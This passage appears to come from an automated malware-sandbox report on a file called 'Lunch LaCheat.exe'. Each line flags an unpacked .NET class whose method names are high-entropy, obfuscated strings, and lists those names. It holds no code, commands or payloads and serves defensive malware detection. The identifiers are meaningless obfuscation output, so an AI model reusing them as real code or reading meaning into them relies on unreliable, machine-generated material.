                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, Ahc13dEy5KVP0BqE5E.csHigh entropy of concatenated method names: 'P37', 'YZ8', 'b2I', 'G9C', 'hAMy1mBUDwEx2rXOl6l', 'loUJM1BeEu05t5cAgSC', 'xLwah6BdvRdcaJCgeFK', 'zIsF8oB4Ohst4mZHOyW', 'mDtiQxBZULvupYnONMx', 'vF1ADbBaBIOnm7Prudn'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, LgEDIqhS04Car44Mop.csHigh entropy of concatenated method names: 'NJU99NQHq', 'RsnpVi0BZ', 'aAbdKrsDq', 'N3wegKcpgHwR2rr6u6Q', 'pYUR3lcEmMv2RIKJGbt', 'RYkQYscCtfQBwZ1qBsZ', 'py1TVDcoUrIscPVoM4j', 'n1yueqcu6FT4hHhRbcA', 'ejkrQIchrKMglcNdyH3', 'o80D58cT8bTeg0STeY8'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, TKA1axtODGwCsrAJYh2.csHigh entropy of concatenated method names: 'Dh9H1AxGpk', 'ULMH9RCGyd', 'Cx4Hp0QPMN', 'Ws7HdhJ44i', 'x8EHc1HL9o', 'rvHxM6glc1lvMehJWYV', 'RM55FGgfhTvBvTKUYZc', 'UOdxNegmV0i8bkOLHSx', 'gx7WIkgrCmroZnH364u', 'PgomNSgDf3esDNSHfV7'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, f8k1fDtZDguyRu368hC.csHigh entropy of concatenated method names: 'uxk', 'q7W', '_327', '_958', '_4Oz', 'r6z', 'r7o', 'Z83', 'L5N', 'VTw'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, SUHxo9tNj7gNTsIAV05.csHigh entropy of concatenated method names: 'ASg78iHlfC', 'JRI7O6QNB4', 'oHo7HOv6uy', 'PSQ7PChfg4', 'GQh77QXcEE', 'luM7g4nfsA', 'Rp47S9GewM', 'wvG7DiND8G', 'KHj73v7iMn', 'MNF7s8pjhS'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, B0A2YIMzsWk7TS3uGdI.csHigh entropy of concatenated method names: 'QTZ2eYxb1w', 'MXr2aN0rRt', 'WmV2CoLnj2', 'TScQVcxhu1qXlhrMr6t', 'PjP3fgxTEVoLdOOUAtu', 'mS7e1FxokiJEbe4YJnK', 'dplGFjxutbvFpXvFTTi', 'vRoDi4xU3vHRgsJ91bH', 'wBhsrsxeOfq7uBa21LJ', 'ciuqhXxdPoS2OJgR3ju'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, yhRfLWt3k6bdGWArgmH.csHigh entropy of concatenated method names: '_7zt', 'Y2d5s7UQpN', 'L1I540HfXH', 'faI5VYRTcn', 'wS15I7tZAN', 'U1c5mxNXvh', 'Hg45uEn0ui', 'YqOicPk3qIJeIYTLNQ6', 'RowPfGktZ4vKdmJ6ayU', 'rOFyxvkDgj86hX7gl20'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, eCD4fOt5DPq948iwBGO.csHigh entropy of concatenated method names: 'erL6pJNwl4', 'tfI6drG2CP', 'C6N6coIPAf', 'SUI6T8omLQ', 'oLr6Kbe96U', 'MWA0wjHGk5xg7L7C3eq', 'Cic4tYHzZ5EcG8VYmr7', 'X7giRhH2Nb6hPeHOJjT', 'G7dIpfH8Om3Lwn6sjKJ', 'vTaFAWk5NyM67DkM9Ki'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, Vb95fHU00YbhYDyu0gn.csHigh entropy of concatenated method names: 'qw5RjX5E4u', 'WK7RxA3kvh', 'DlyRFaKs7R', 'zaAZ6uCuOTrQQCO836R', 'dOL0plCpeVIMNhkew1d', 'BXmpOuCoUwnUe5BCqio', 'P6QUBJChv4C6xiEa0O0', 'jKMcgZCTWOkPwYQSAdq', 'pxHyKRCUvWKMttg2kcZ', 'NNfEdpCe43h4k4Xao3h'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, VMFniGxPuBqy8bufcO.csHigh entropy of concatenated method names: 'kcq', 'YZ8', '_4bQ', 'G9C', 'zPLBIJI6EAx2AuarbQN', 'a8VU2NI7hlQURo19q9X', 'Sem2FAIyQ0lGs9g5Jv3', 'mNTkmRIqiiVNQEglCu2', 'VHvEa4I9VtmwOVg7hUC', 'RFU3TgI0utCXWLQGj4R'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, qlXAoh1gngc2opxxXE.csHigh entropy of concatenated method names: 'g25', 'YZ8', '_23T', 'G9C', 'aylWtpi92', 'bkRHbAnMkiHllHmNCPr', 'zfe9y2nEZHlKM4NJHNc', 'ySuEJOnCRbb7HMHeWFd', 'bjiC8nnp0SmrslLefZW', 'oTUm6dnoR9vFeGY0KSB'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, ScE4clqkd8XEwfbUW0Q.csHigh entropy of concatenated method names: 'OH3fmYWQbU', 'njgfuPUfCh', 'CMEfRvB0Oc', 'lYYCbQA0gq0hdyRggSO', 'jA3j8uAqlS3WG0i99jj', 'BAUOatA9ivHQqX57BbY', 'fPfRJmAAPsbnU2HAHFy', 'zpOlMpARosx03mAD4Fm', 'xatfDuAiR0j7IYdrLRh', 'IACDsBAPpipjifvZXUl'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, USnMqttFK6BlomrJdIc.csHigh entropy of concatenated method names: 'P29', '_3xW', 'bOP', 'Th1', '_36d', 'GjkP7CybKT', 'XmhPgyvQWU', 'r8j', 'LS1', '_55S'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, h6vuwetSTCvG7UVGrTy.csHigh entropy of concatenated method names: 'QXj5tbqNGh', 'EHN5UH0y3X', 'Niq5XVfIUT', 'pZaAH1kw9m1BCP98Ddp', 'dYDMN1kfqlvFXkd8234', 'lh7iiZkXQpwkl5pn0BU', 'gVrcfykWg6G2SRfcUtA', 'sAYATckmVN2tioX9gJ0', 'uSPpnyklCeAGqHelk9u', 'G3Zg4mkrR64KQ4AJyYl'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, r70NTtMtM1uhGa8tvNh.csHigh entropy of concatenated method names: 'ba8wnj0pnM', 'dQ6wWL6GZO', 'HPBwAC7FAa', 'qqmwoRnjG3', 'TsdwE0WyU9', 'icWwjffg5Z', 'J8irNElFIn7Wn6y2175', 'U6uf2Nlg2avZgNruTKk', 'QeO9Nllj2DyE3o8HkOT', 'UMm4x9lbpKZ5oTtANUS'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, mBP0oLLioGhwXAdkrn.csHigh entropy of concatenated method names: '_52U', 'YZ8', 'M5A', 'G9C', 'RD4vFCIKLIHllJerkY6', 'uvCP9wIYLrArEjhk36T', 'l3o5nHIJZ6Zu4y1Gyib', 'mo1tbvI2Zx5AqH6r5ZN', 'FIakaWI86otfJgW9sxD', 'cDlgDBIG7OAMCa9t6E0'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, KHdCRefmbkXs3K6gETN.csHigh entropy of concatenated method names: 'U2ttViaejt', 'eHqtIYFZSi', 'Yf8tmR0mCh', 'dKftuZJaha', 'YNotRMtWH5', 'vAiHkRW5DW67my42vGf', 'DGMhAhWcfBjt63gg8Ji', 'iFGOBvXGAF29XqhO46h', 'BQh4G0XzrsbXQeLGmKA', 'UH7Zw5Wn3n8D3mhT9rP'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, LMjjpmqliahLUcLnGsv.csHigh entropy of concatenated method names: '_589', 'YZ8', '_491', 'G9C', 'KfdqIZ0a3759TGBu5PR', 'dc2KE40SB5kdmDO36nt', 'WukPRJ0sGktsPStdt1N', 'XWbLkl0VAVrl3ZWaPF6', 'w2H7td0KNICT7stNJ3F', 'xYLhGd0YOhdnj9i3HJK'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, fttbW4MDcJoMNSH5luT.csHigh entropy of concatenated method names: 'qJXJYpW99r', 'J2gJldmVh1', 'GHjJvt3wrp', 'bk1JN6UCD4', 'bODJiPq948', 'hGmGUUN6i8Q9mATGUco', 'k5v9pUN7Av8ih4vYORN', 'mv1KLuNB9ITBxXnAx9k', 'k15qJMNImxrfpVGCfQW', 'JcDtgkNyl5ay1YPElJX'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, DAsN0KqaOCtdgS3tEyf.csHigh entropy of concatenated method names: 'GvP', 'YZ8', 'bp6', 'G9C', 'M6bISbqElc2gBTqnY69', 'gv7VZ3qCnc1PaSvp2Ir', 'aPJVY0qp1Ytv8ghp49E', 'hGXX9LqovAi91ujCX4d', 'YmHOsCqu74Uti3CRdZN', 'SlDBkJqhuCrggQ7uDub'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, UlZg75qsQwJiM21bO65.csHigh entropy of concatenated method names: 'lHIqCRnmAO', 'vMgMF0yfJ8TikhX2JrH', 'y0HOBuymjT37Y7qUx2h', 'w22e1AyWFE8HZhM0DNL', 'ANdsv9yw6wD9muTxSB5', 'twyKcYylT8BWuQF1YcT', 'saTZbGyrug8BVIVsd20', 'P92crFyDmlOTLF4bFuE', 'LNu749yN3gnq0LspyUI', 'f28'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, B0aWXNMnlXn2BLGMp6h.csHigh entropy of concatenated method names: 'sg9', 'Ulq51Ji3mp', 'AJXZLAKlpa', 'thE5H3BDVC', 'sTtO0B3ZeCiOkoYtyRi', 'fAqy4B3a2PsP4Csb2GE', 'vtMweA3SARa1hcsJZst', 'OiSpfI3dk3Lt4obXW8F', 'AJuwmF344OoGZRVvedm', 'YawJpm3sYwIUgtktTEe'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, gI07OVUv4aW9pt78401.csHigh entropy of concatenated method names: 'wsB8tf822i', 'VUf8UA23TH', 'dQj8XeOEdi', 'LwO8w8sMco', 'sR58JxMG3p', 'kfR8ZR3xYr', 'fmk82qvu9R', 'riu8B4g1M9', 'kQk86mZJwj', 'RKe85rMYEe'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, ruGDE8wHCs1LugFJYDC.csHigh entropy of concatenated method names: 'kB38y8dk5oW2xdKQBrP', 'G6ZbBJdgUO6CLx48d5K', 'dDPudsdxa6pJGbmnmKi', 'b0GZXwdH7ygfxCFOP1w', 'BkAGPB7unW', 'oZOOPmdb3qMR2OdZTra', 'N4YP0Cd1iuhaXhBVh26', 'NS4jk6dO3LJwCCJHcdh', 'cjeMFidvcwPeWVu3eAE', 'G4SHC9dLD6xHeQMsvhm'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, zjoE3wqcjVQABWnuZwJ.csHigh entropy of concatenated method names: 'LDwqLbeMqa', 'bU33lM9CY6QbqkUuSXQ', 'edxOpB9puVMW4WRBXYU', 'u2okGP9MG0fEDvWvjeu', 'kDPEj09ExKrMrEl81QS', 'dv3GOp9o4yBpxyypgav', '_3Xh', 'YZ8', '_123', 'G9C'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, nldwCqME01ywJTeITCX.csHigh entropy of concatenated method names: 'oYo', '_1Z5', 'v0e5Yer2Yh', 'gGg2tdWOIW', 'hBV53OseBt', 'cuvwY2tiF6T0xlmhlRC', 'DbBHZOtP9vQ03rGX3cr', 'zyxEwctXsbdURV0wraa', 'T257FqtW9ce8SpJEWSC', 'SFoZ3ZtwJPZTejL75Gm'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, jVQRA9qILNDR4ueVNdL.csHigh entropy of concatenated method names: 'gHL', 'YZ8', 'vF9', 'G9C', 'oktDTryxsKvOiykeSyp', 'aSXGyWyHbHVuvujaXVW', 'j9DsnTykvOXD7VqlgNy', 'VsEnKxygPhd1RbnlKLC', 'f2ttHIyjk17CiWnkXlh', 'LBdBwxyFOHpWMnIyeFy'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, ykUT5HnIRnmAOVRT6X.csHigh entropy of concatenated method names: '_66K', 'YZ8', 'O46', 'G9C', 'eY2MbUB0PecUyh3V2wW', 'd8pkn0BAPJITW9DDqcq', 'Tv5aE7BR4L0wAL8jA7R', 'mMPINVBiepktgJ302Pr', 'M4gHVpBP6fZUQTFsMM1', 'cPKUSUBX6ioO9PN9JUd'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, zy6GHpNEirDwbeMqaG.csHigh entropy of concatenated method names: '_88Z', 'YZ8', 'ffV', 'G9C', 'YfPN9GIe92ZZpZ9hmoH', 'ADWV0RIdwoLO8FWq0Ir', 'c0DhSCI4rJqavKqnUCf', 'wHH5RqIZVucg3SkrGbq', 'pujxo0IaN1clKxhtVbC', 'XqoEwiISvg6R27NyE7H'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, j8yowCfSyTNdR3Qg4Jh.csHigh entropy of concatenated method names: 'z4DMLvf7yf', 'zwLMk4iAhK', 'IYjjs7PluGqUdZbLiIU', 'o2O2kGPrC5Li2fny4MT', 'onGWsrPDJhjoSEs4QKE', 'ECpQQ1PNIZyjHTTKWXl', 'skwvxXP31xojtFQeYcO', 'OUkWPoPtURsH0OCLxTV', 'SVewE2Px9vtFQksqGyF', 'jJ24xJPHrOK9SaMtxTS'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, X1FXHctVq7kE4pJRmYh.csHigh entropy of concatenated method names: 'LkY51lKamo', 'apE59apTLb', 'l185p0gr7V', 'oNr5ddQGeP', 'v1x5c60a9L', 'Uuty8tkM18wp61hrkDf', 'VeRQjGkEHw3Q8asgmVu', 'Fbw6jrkvF7gtX0xJpVa', 'lC0gFckLZ18puOV2AUc', 'AMtCArkCcB6NLMt5FHW'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, XfZ5nTqO2eBgWgje4xu.csHigh entropy of concatenated method names: 'Ai7', 'YZ8', '_56U', 'G9C', 'sTi4UqyGRJftkS1ZHnt', 'aNQkoEyzVITyOnD7t8F', 'X8PHJDq5Jo8W1Z56NsX', 'JnVY21qcxIgQ4hFRZVs', 'lyvonuqnw8f7bxLb3DN', 'vVOG7WqQl5pajghAZns'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, Lt3DSvqMxZcQ5oZBmim.csHigh entropy of concatenated method names: 'R1x', 'YZ8', '_8U7', 'G9C', 'ti108i6bPMh7NNdD0Fg', 'gVVhxC61nmmPWuhSTk4', 'DQbUm86OGZcdm3KKjFo', 'KRhhys6vb76PXjs3uIn', 'gJmdVq6LVSYWZoOx71F', 'HOeuRI6MHyj8SAiueEi'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, Jb85v1sq6IWCtQ7Vqu.csHigh entropy of concatenated method names: '_0023C', 'IndexOf', '_0023D', 'Insert', '_0023E', 'RemoveAt', '_0023F', 'get_Item', '_0023G', 'set_Item'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, vK3PiltUTHMLVDrDT8n.csHigh entropy of concatenated method names: 'FBr6S3mhmp', 'mvGkoXHmahBtZ5DeyAP', 's3yI1IHlnbYWQ0cDjsW', 'tubhBvHwJMxNiUtCSoD', 'f06gDqHfv0377bFQKfj', 'tXv20oib2p', 'TDc2G9dTCL', 'wwZ2bbYM8P', 'edZ214Srfu', 'q8N29cRarq'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, q8LHkBqBZc0BmxvQWYH.csHigh entropy of concatenated method names: '_6U6', 'YZ8', '_694', 'G9C', 'dc2h7s7l2bZ7ac2bgs5', 'XXkXrf7r24Mh4osJaef', 'BJKaqZ7DZBiopasUQXP', 'vOvdmP7NkIm7avuOprL', 'lb9aJS73vL1Cn8CVhEV', 'O9TKQq7t156fMSeGKyv'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, VwsI0eXAjxgDO5eO946.csHigh entropy of concatenated method names: 'PJ1', 'jo3', 'QhACZG1nuJ', 'gnxC2qDR75', 'xgbCBXBdC6', 'EC9', '_74a', '_8pl', '_27D', '_524'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, z8gUbRX871YUO6KvEjH.csHigh entropy of concatenated method names: '_7tu', '_8ge', 'DyU', '_58f', '_254', '_6Q3', '_7f4', 'B3I', '_75k', 'd4G'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, ix9Miew8MmrhPUW6iG7.csHigh entropy of concatenated method names: 'A7EGRZWto2', 'MlUG8wO8sA', 'zjHGhA80h0', 'k1tGOFYPLo', 'H8kGetCy2q', 'cIMGa7LTR1', 'yQLGCpAmy2', 'nkHG0qyIkQ', 'h4SGGYebre', 'lokGbybUQ7'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, ctiO1aUb80GXStvVQ3f.csHigh entropy of concatenated method names: 'sFTRYKjJvv', 'YFXRl2LSuZ', 'igKRvQ9RUr', 'aKNRNk5oQf', 'KGWRiMrEoo', 'q2hRL9enh2', 'vNOWsDCZGATwrY8gMq6', 'PJwbB8CdW955LNt4iEj', 'rvCMDxC4DFbmX1a1HI4', 'CaATkkCauyj44NtKGXO'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, nhbQX4wTCE0caeKIHB.csHigh entropy of concatenated method names: 'EQXH4TCE0', 'Yi8356vripC8ilFp0f', 'SSvq0R1MYTyTJUTY0G', 'HWNHdtOUXBWVAWXdIX', 'L0xsrELxFiDu0W9bFR', 'AiWZ4IMeVAmJ4F6jb1', 'OIIfH6Xm7', 'qkJML7FH5', 'wxltexwLw', 'mafUaGdQV'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, Yarf2vfPQwRKas0dOld.csHigh entropy of concatenated method names: 'YcBMNnVE0A', 'bFKFfAPQdJqDSLdxsRN', 'Ui04YvPBQas2ifmOoHO', 'FOsO4HPc1PT3R8IgsnS', 'VKZ4elPnV1yPfUV0Mae', 'sBfOimPIjyexNZHuxP8', 'LsGyCqP6Y0Sw1YbN2SJ', 'Ga87hZP7Iypv8oK2YEZ', 'j6PrYqPyXHrUnWoAJsd', 'mwpOhCPqk5ZNWH9xbCN'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, RSx3mxln0wS0orPm0E.csHigh entropy of concatenated method names: 'pHw', 'YZ8', 'v2R', 'G9C', 'l2h1jXIjN1EHXRcdH8S', 'o2Ni80IFl7jUaGDcfSK', 'AVxZQ1IbsIs8ixlkEH7', 'rvguNmI1uOZvsnpN8hn', 'yiOQn9IOE4VjSvBjfxx', 'TZRaJjIvBLBitp2ap4b'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, Au6u9NXX2BPw1dlx1cN.csHigh entropy of concatenated method names: 'Qkp', '_72e', 'R26', '_7w6', 'Awi', 'n73', 'cek', 'ro1', '_9j4', '_453'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, Thw6BMqwvwHF16riBkP.csHigh entropy of concatenated method names: '_6H9', 'YZ8', '_66N', 'G9C', 'DXXyLe6YjtAoUAlR400', 'IsQInp6JBBf6Bax69i9', 'RrgwEw62ZWLWR5FdqKm', 'nJmgoR68sn0tOY8nH2p', 'YDje1g6GePELr76Akld', 'UkWNYr6z9qJd2t0UiHX'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, OKOFf3AyEOTeQ8sF02.csHigh entropy of concatenated method names: '_468', 'YZ8', '_2M1', 'G9C', 'HHARG2BfYWdYMpdL3vl', 'yqnvCRBmK9is93gbZw5', 'RAdw8XBlerWmPNMHejV', 'tBcVD7BrGUwGmKKlW1U', 'V53aXFBDCHnwZbTRin8', 'fjI1qBBN3EMlGrTwMVj'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, iWMFUTm5Qgip1Z9i3E.csHigh entropy of concatenated method names: 'f1HRteHcI', 'KLh84nVgP', 'wkfh2Pa3I', 'Tp5OiNLJJ', 'tybeBsmlv', 'FegawM7Yt', 'Ku0CqOYbu', 'PKpGNPcyg7aCyWqRSYn', 'pV5Pahcqqo1MKYaLtGX', 'RpdF43c9ENdB4rxPv91'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, suwuZqqUaCC4bv2jsNt.csHigh entropy of concatenated method names: 'K55', 'YZ8', '_9yX', 'G9C', 'sAHwBF6dCOL3BN4shTu', 'dLDqJK64nHlexilVgsx', 'yJLm8S6Za6VXOQa402f', 'aIAlpp6ade7u8qbGyOX', 'PSKl916S7BgsIc6XHEM', 'KOA13J6sJdCf3N482rU'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, bUKS09MsXqrMAhvIgjN.csHigh entropy of concatenated method names: 'LVkZ7ydJL1', 'RXHZgcq7kE', 'spJZSRmYhS', 'nYPaFINUATgOmD2wdj3', 'avDaptNhqOKZG3eGdIL', 'OR93XGNT6Xj1A8YDkQk', 'KmXl6UNecbQwCXrqvXN', 'yJ6ZXvuweT', 'CvGZw7UVGr', 'JyaZJQgawe'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, r1Nd7VMgjpfgH8UhQxo.csHigh entropy of concatenated method names: 'CQFJxOA333', 'GPlJFtAkWb', 'twOJQmTxvP', 'zFOKUnDdD04qbhNC0yh', 'WHPR53D4h4jXhm4myGP', 'RDpdGxDZmn1Zwm7je4L', 'AtyTDdDavXYI4CjUynr', 'rsElwBDSV37y8BAOoeX', 'nYNKVTDsrCsQdvXY4Ar', 'MwpeOGDVh3NZsXZT7X7'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, Fioc1Eq5kI2Wt8Yw2K3.csHigh entropy of concatenated method names: 'd43', 'YZ8', 'g67', 'G9C', 'pe8Y567gq5BdfHvRsHG', 'fycxlI7jSB8cgfDGNOp', 'jCO1mL7FZccHMJ3VyCm', 'kIkAFj7bdSYdMSAh8Np', 'kar2iO71X55aoCpyS4x', 'enfFTM7OVdnv3amTJ84'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, dVUBQucrV6vLHbsrlB.csHigh entropy of concatenated method names: '_59M', 'YZ8', '_1zA', 'G9C', 'Sx2g3IQEkNSyapVAdBm', 'ptGwXiQCWH9aZxJjeOS', 'R6XEt4Qpghm4myNgS0A', 'EnaSu1Qo508gWs5LXdV', 'oZdGeGQuOnEbNesrKRw', 'nDI3xxQhPTyyaEyjr35'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, bWvKHFeX1fCoZwKOW0.csHigh entropy of concatenated method names: 'T43', 'YZ8', '_56i', 'G9C', 'D4idk5n0rHxOIMbXBpD', 'j99aY5nAJp7JVUikfi0', 'kjbyW8nROFsLNZpHQJ6', 'jTMKvkniuyvkpf3VChZ', 'YZHjornPXX4SAkLd81W', 'slmX5gnXcGpNtg8Lc7I'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, gKJnY3fffZyAJh7UTXY.csHigh entropy of concatenated method names: 'RUNfjSb3Gb', 'qYlfxlZg75', 'SwJfFiM21b', 'z65fQeKRl3', 'jvXfYxaNYC', 'NTOflNCx0T', 'JFajgeRfh54h82epLwk', 'IXH5CyRmGleZOV1rM2I', 'Q73ZJmRWIuIR6u6KGDB', 'Od9WKuRwpETgG1aBejd'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, v1H9NwqEOJDUB1tm5YX.csHigh entropy of concatenated method names: 'NKxfBJ9gEb', 'z1Tf6PI5PK', 'WyaLBQ0AmR8piRUljVY', 'xAvxBW09gEq0CG7AUy3', 'JgGt2K00mDjaXfxpECQ', 'CYkRpL0RaLhodWbkQKH', 'HnjsTg0i36s9WZlKYfM', 'L03M900P13ChX4MvafH', 'TIpof00XSGngI1vTvvj', 'SF0ZoB0WgDTwMsMjVcH'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, Fnr6ywMQNBPcTXUFQeh.csHigh entropy of concatenated method names: '_3VT', 'O5t', '_1W5', 'IT02B0NaA8', 'Qjt5q4hF13', 'Cyo2606ER3', 'vko5IrU3jc', 'sDiMNXtp85QCCZP79fg', 'rsYW6lto7dgftD01ift', 'r0Su44tE2uY5h1WWjtd'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, wqRwrbX1J1I0lijql3J.csHigh entropy of concatenated method names: 'qyJ5TjUBrcELHDypRVR', 'okjImSUIpVSNypJkCGa', 'LULUEqUnkXXGocgk3ky', 'mRBREgUQCPKKyohB9iq', 'qjpO9d8jf1', 'WM4', '_499', 'lYROp9AR7q', 'xQjOdZft1Z', 'TfaOc8KN6Z'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, SnxHSTqDkQ0SnKZtlax.csHigh entropy of concatenated method names: 'yiQ', 'YZ8', '_5li', 'G9C', 's6IhVny5iCelJ8n2iZ5', 'bMhYt5yciBLIP5L6eew', 'CX02B3ynMkPf0nmVUtp', 'oMPJH7yQv8t8cvAnt4I', 'NXqCtlyB1LE0DFyDUv4', 'EsokVRyI9Xb9FF5MMqS'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, zmTxvPtB3JXpW99rT2g.csHigh entropy of concatenated method names: '_4J6', '_5Di', '_1y5', '_77a', '_1X1', '_7fn', 'OUK', '_8S4', 'wUn', '_447'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, nKFhZaGINSnlIuOGr6.csHigh entropy of concatenated method names: '_52Y', 'YZ8', 'Eg4', 'G9C', 'oU4K1Tb85', 'Dj5REmnlY70lckCAcCY', 'qqChvVnrHb4tv0pesFG', 'hJsE6fnDqDqZAxYKs03', 'eCPPmMnNVMOi2NJ8FYU', 'lIaM53n3hgmj0mlweVl'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, MZcSW5XFnMZt2tTbkg5.csHigh entropy of concatenated method names: 'Aj5CmemkBa', '_1kO', '_9v4', '_294', 'qpbCu8eZ1t', 'euj', 'MOiCRpBV8q', 'AeaC8rGIAN', 'o87', 'lb1Cho7prW'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, WWqZNXK75NEoPq9OON.csHigh entropy of concatenated method names: '_23T', 'YZ8', 'ELp', 'G9C', 'QNjyldQJYfb7F6L0bLM', 'ssMcBqQ2AgGWB1IgPnB', 'o2aqMYQ8P280noQTDmF', 'GSCGFYQGOiA1roIXyaY', 'PI3mSKQz1S28VLSo76D', 'dKVWDhB5Pf6DTg4wcVp'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, mVPDZufZM2W7mkK879j.csHigh entropy of concatenated method names: 'J2UMbVjRB6', 'wLOM18f94l', 'bRDM9RQIua', 'FCCMpiX6Rh', 'zCuMdgCvtb', 'VVjMcclkjW', 'cmGMTsVGNs', 'WvRvtyixcFHmYmeLPBl', 'vecaksi3AcyP4Q2SSkc', 'B21HkIitdPNVhIQbKia'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, jnVE0AqQ75AvvmYSO4D.csHigh entropy of concatenated method names: '_7v4', 'YZ8', '_888', 'G9C', 'NEOdEQ0O8F4GBDd9q3v', 'ANwRux0vVtbqoP3mbIo', 'bf7KUY0LWWhMWRwFqNq', 'dTeDGm0MtXA15BKAT4q', 'MBV3610Ee14N1BUI0C4', 'IauNtu0CQvuFhNmEbxV'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, GXbGVUq9ec7tQ7QY4FA.csHigh entropy of concatenated method names: 'CorqlPm0EZ', 'dbCT6b9xt4SIjwGcTpo', 'Cc23qw9Hqw51fELBEUP', 'YqP1vO93KQCXtLglce7', 'qKypAP9tH44l4i9GFWP', 'Ut14gR9kUUP4DYoGUC0', 'QLw', 'YZ8', 'cC5', 'G9C'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, S4xuYYf4VvkDUfoJrma.csHigh entropy of concatenated method names: 'KmItHy8RCX', 'hfvtP2Yevb', 'fKgfm6XxBJm57GNKGjt', 'gkZKx3XHYrOWnbe0sTQ', 'vhEvxIX37eiiOpQw5vM', 'cdE2eEXtTCVwNauLgZc', 'JCtPOqXku8GaQnNosNH', 'erP1AoXgwSSZCm0IOnB', 'S1qVpaXj6TCm7j3DOi9', 'oFfOsFXFEYwfmI07iEk'
                        Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, spviIXXITu8HiQLRydd.csHigh entropy of concatenated method names: 'K20h4TKijO', 'P5uhVdQO1L', 'pn4hIRSyqM', 'ERehmlw0LM', 'wtphusGQWs', 'cLQyeou26FrYqdVs4PA', 'kwTChXu8ZTKPtB0WkkT', 'zkRfCquGBv3XTY00Tcp', 'yqmxEJuznAIeCmuCpIQ', 'jVq0sjh5xhViu2lD1ig'
